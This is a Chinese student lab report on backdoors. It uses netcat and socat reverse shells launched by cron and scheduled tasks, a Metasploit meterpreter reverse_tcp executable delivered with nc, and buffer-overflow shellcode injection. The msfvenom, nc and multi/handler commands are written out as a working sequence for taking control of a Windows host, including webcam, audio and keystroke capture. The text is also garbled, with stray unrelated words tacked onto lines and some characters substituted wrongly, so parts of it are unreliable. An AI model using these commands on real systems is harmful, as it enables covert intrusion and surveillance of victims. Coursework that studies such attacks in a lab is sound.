NF_Exp2_20164306(補充加分項)

後門原理與實踐

1 關鍵內容

使用 netcat 獲取主機操做 Shell,cron 啓動shell

使用 socat 獲取主機操做 Shell, 任務計劃啓動vim

使用 MSF meterpreter 生成可執行文件,利用 ncat 傳送到主機並運行獲取主機 Shell
windows

使用 MSF meterpreter 生成獲取目標主機音頻、攝像頭、擊鍵記錄,並嘗試提權tcp

2 基礎問題回答

例舉你能想到的一個後門進入到你係統中的可能方式?

瀏覽掛馬網頁性能

下載惡意軟件編碼

打開可疑優盤spa

例舉你知道的後門如何啓動起來的方式?

修改註冊表項,開機自啓動命令行

設定啓動週期,定時啓動3d

開啓監聽,知足特定條件後反彈啓動調試

Meterpreter有哪些給你映像深入的功能?

能夠簡化任務建立多個會話

工做模式是純內存的,難以監測,不留痕跡

如何發現本身的系統有沒有被安裝後門?

跟蹤可疑進程

檢查註冊表項

更新病毒庫並及時查看殺毒軟件的提示信息

3 Win 得到 Linux Shell (netcat ,cron 啓動)

 實驗用 Win 選擇 XP 系統

下載 netcat 並解壓,關閉防火牆

kali 關閉防火牆

  ufw disable 

windows 打開監聽

查看 windows IP

  ipconfig

 

在 kali 環境下使用 vim 編寫定時任務

 crontab -e

將編寫格式 mark 以下

3 月 23 日 21 時 33 分反彈鏈接,發送 shell

 xp 得到 kali shell

4 Linux 得到 Win Shell(socat ,任務計劃啓動)

windows 添加計劃任務

開始→控制面板→性能和維護→計劃任務→添加計劃任務

涉及到組策略調整或用戶密碼設置

添加參數,重定向命令行

kali 鏈接

出現亂碼的緣由是兩者使用不一樣的中文編碼方式

5 MSF meterpreter 相關(完成傳輸,實現攻擊,獲取信息)

 查看 kali IP

  ifconfig

使用 meterpreter 生成後門程序

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.176.130 LPORT=4306 -f exe > 20164306.exe

kali 向本地端口發送文件 

  nc -l 4306 < 20164306.exe

windows 從 kali 處接收文件

  nc.exe 192.168.176.131 4306 > 20164306.exe

進入 msfconsole 進行相關設置

  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST 192.168.176.130
  set LPORT 4306

開啓監聽

  exploit

運行 Windows 上的後門程序後,kali 獲得了控制權

控制攝像頭的相關指令,通常狀況下,使用前首先使用 list 檢查是否有可用設備

獲取音頻截屏鍵盤記錄提權啥的相似輸指令浪就完事了,如下是實驗結果

6 總結與感悟

除了實驗中嘗試的後門實現方法,網頁後門、帳號後門、C/S後門也是經常使用的攻擊手段

實際生活中用於蒐集信息的一些反饋錯誤程序、調查提交程序實質上與後門無異,它們會控制主機自動鏈接其它設備並進行數據交互

咱們須要認識到後門的危險性,積極防範,警戒上述程序被攻擊者利用

 

7 生成 shellcode ,經過緩衝區溢出使靶機鏈接

在 kali 環境下實驗,經過不一樣終端操做,攻擊者、靶機 ip 地址相同(我連我本身)

實驗用 pwn3 爲 pwn1 的備份文件,修改權限爲 777,關閉地址隨機化,開啓堆棧可執行(詳見 Exp1)

MSF 關鍵參數 mark

 

生成 shellcode,規避  「\x00\x0a」 ,以  c  的形式輸出到文件 shellcode 中(-o)

規範格式,去除文件中的引號、回車等字符,以便構造 payload 

構造 payload 並輸出到 shellcode 文件中,內容爲上述字符串補 32 個 A 和一串 \x90,地址待定

調試,肯定返回地址

在另外一個終端裏 gdb(詳見 Exp1)

將對應的 \x90 替換爲具體地址(落在nop區任意位置便可) 

此時payload構造完成,打開新終端模擬攻擊者,進入控制檯完成配置並開啓監聽

運行 pwn3 ,注入 payload,鏈接成功!

相關文章
相關標籤/搜索